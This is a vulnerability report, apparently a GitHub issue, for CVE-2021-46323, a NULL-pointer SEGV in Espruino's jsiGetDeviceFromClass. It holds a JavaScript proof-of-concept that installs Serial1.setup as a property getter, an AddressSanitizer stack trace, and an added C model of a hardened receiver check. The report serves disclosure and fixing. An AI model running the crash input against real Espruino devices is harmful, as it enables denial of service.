CVE-2021-46323: SEGV src/jsinteractive.c:100 in jsiGetDeviceFromClass · Issue #2122 · espruino/Espruino

Espruino 2v11.251 was discovered to contain a SEGV vulnerability via src/jsinteractive.c in jsiGetDeviceFromClass.


Espruino revision

Commit: 53108085
Version: 2v11.251

Build environment

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86_64)

Build steps

export CCFLAGS='-g -fsanitize=address -fno-omit-frame-pointer'
make clean && make

Test case

function JSEtest(v, i) { if (i === 1) { return v === 12; } return false; }

var obj = { length: 2 }; var h = 11;

// The native Serial1.setup is installed as the getter of obj[1], so any read of
// obj[1] invokes it as a getter rather than as a method called on Serial1.
Object.defineProperty(obj, "1", { get: Serial1.setup, set: function (args) { h = args; }, configurable: true });

// Evaluating obj[1] inside this object literal runs that getter; the stack trace
// below (jspeFactorObject -> jsvExecuteGetter -> jswrap_serial_setup) is this read.
Object.defineProperty(obj, "0", { get: obj[1], configurable: true });

assert(Array.prototype.some.call(obj, JSEtest));

Execution & Output

./Espruino/espruino poc.js

ASAN:DEADLYSIGNAL
=================================================================
==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000000 (pc 0x564b36989594 bp 0x7ffddbd07060 sp 0x7ffddbd07060 T0)
==The signal is caused by a READ memory access.
==Hint: address points to the zero page.
    #0 0x564b36989593 in jsiGetDeviceFromClass src/jsinteractive.c:100
    #1 0x564b36e1e10c in jswrap_serial_setup src/jswrap_serial.c:283
    #2 0x564b36948eee in jsnCallFunction src/jsnative.c:223
    #3 0x564b3695a983 in jspeFunctionCall src/jsparse.c:609
    #4 0x564b36981d1e in jspExecuteFunction src/jsparse.c:3044
    #5 0x564b3687d2ce in jsvExecuteGetter src/jsvar.c:1965
    #6 0x564b3687ec87 in jsvSkipNameWithParent src/jsvar.c:2199
    #7 0x564b3687f34d in jsvSkipName src/jsvar.c:2212
    #8 0x564b3687f34d in jsvSkipNameAndUnLock src/jsvar.c:2244
    #9 0x564b3697cb58 in jspeFactorObject src/jsparse.c:1261
    #10 0x564b36979ed2 in jspeFactor src/jsparse.c:1673
    #11 0x564b3695c91f in jspeFactorFunctionCall src/jsparse.c:1160
    #12 0x564b3695df38 in jspePostfixExpression src/jsparse.c:1786
    #13 0x564b36959436 in jspeBinaryExpression src/jsparse.c:1955
    #14 0x564b36959436 in jspeConditionalExpression src/jsparse.c:1991
    #15 0x564b36959436 in jspeAssignmentExpression src/jsparse.c:2050
    #16 0x564b36959436 in jspeFunctionCall src/jsparse.c:578
    #17 0x564b3695cbd2 in jspeFactorFunctionCall src/jsparse.c:1184
    #18 0x564b3695df38 in jspePostfixExpression src/jsparse.c:1786
    #19 0x564b3696183e in jspeBinaryExpression src/jsparse.c:1955
    #20 0x564b3696183e in jspeConditionalExpression src/jsparse.c:1991
    #21 0x564b3696183e in jspeAssignmentExpression src/jsparse.c:2050
    #22 0x564b3696183e in jspeExpression src/jsparse.c:2056
    #23 0x564b3696f6d4 in jspeBlockOrStatement src/jsparse.c:2124
    #24 0x564b36971a1e in jspParse src/jsparse.c:2136
    #25 0x564b369803ea in jspEvaluateVar src/jsparse.c:2996
    #26 0x564b369803ea in jspEvaluate src/jsparse.c:3026
    #27 0x564b36790025 in main targets/linux/main.c:460
    #28 0x7f5e1f196bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
    #29 0x564b36793bc9 in _start (/root/Espruino/espruino+0x4ebc9)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV src/jsinteractive.c:100 in jsiGetDeviceFromClass
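The trace shows jsiGetDeviceFromClass being handed a NULL receiver (the fault is a read at address 0, "zero page") because a native method was invoked as a property getter instead of as a method on Serial1. The following is an added, simplified C model of that path, not Espruino's own code: the type and function names (JsObj, device_from_class, serial_setup, run_getter) are hypothetical stand-ins, and it shows the defensive shape a native binding needs, rejecting a missing or non-device receiver rather than dereferencing it.

```c
/* Hypothetical model of the crashing path (not Espruino's types or API):
 * a native binding receives the JS receiver and maps it to a device. */
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>

typedef enum { DEV_NONE = 0, DEV_SERIAL1 = 1 } Device;

/* Stand-in for a JS object; only device-class objects carry a device tag. */
typedef struct {
    bool   isDeviceClass;
    Device device;
} JsObj;

/* Constructed sample objects: the Serial1 class and a plain object literal. */
static const JsObj SERIAL1_CLASS = { true, DEV_SERIAL1 };
static const JsObj PLAIN_OBJ     = { false, DEV_NONE };

/* Hardened lookup. The crashing version dereferenced the receiver
 * unconditionally, so a NULL receiver read the zero page; here NULL or a
 * non-device receiver simply yields DEV_NONE. */
static Device device_from_class(const JsObj *cls) {
    if (cls == NULL || !cls->isDeviceClass) return DEV_NONE;
    return cls->device;
}

/* Model of a native binding like Serial.setup(): returns 0 on success and
 * -1 when the receiver does not identify a device, instead of faulting. */
static int serial_setup(const JsObj *receiver, int baud) {
    Device dev = device_from_class(receiver);
    if (dev == DEV_NONE) {
        fprintf(stderr, "setup: receiver is not a serial device\n");
        return -1;
    }
    printf("configuring device %d at %d baud\n", (int)dev, baud);
    return 0;
}

/* Model of the getter invocation: the property read supplies the receiver,
 * which the trace above shows to be NULL when a native method is used as
 * a getter on a plain object. */
static int run_getter(int (*native)(const JsObj *, int), const JsObj *receiver) {
    return native(receiver, 9600);
}

int main(void) {
    int ok  = run_getter(serial_setup, &SERIAL1_CLASS);  /* 0 */
    int bad = run_getter(serial_setup, NULL);            /* -1, no SEGV */
    return (ok == 0 && bad == -1) ? 0 : 1;
}
```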
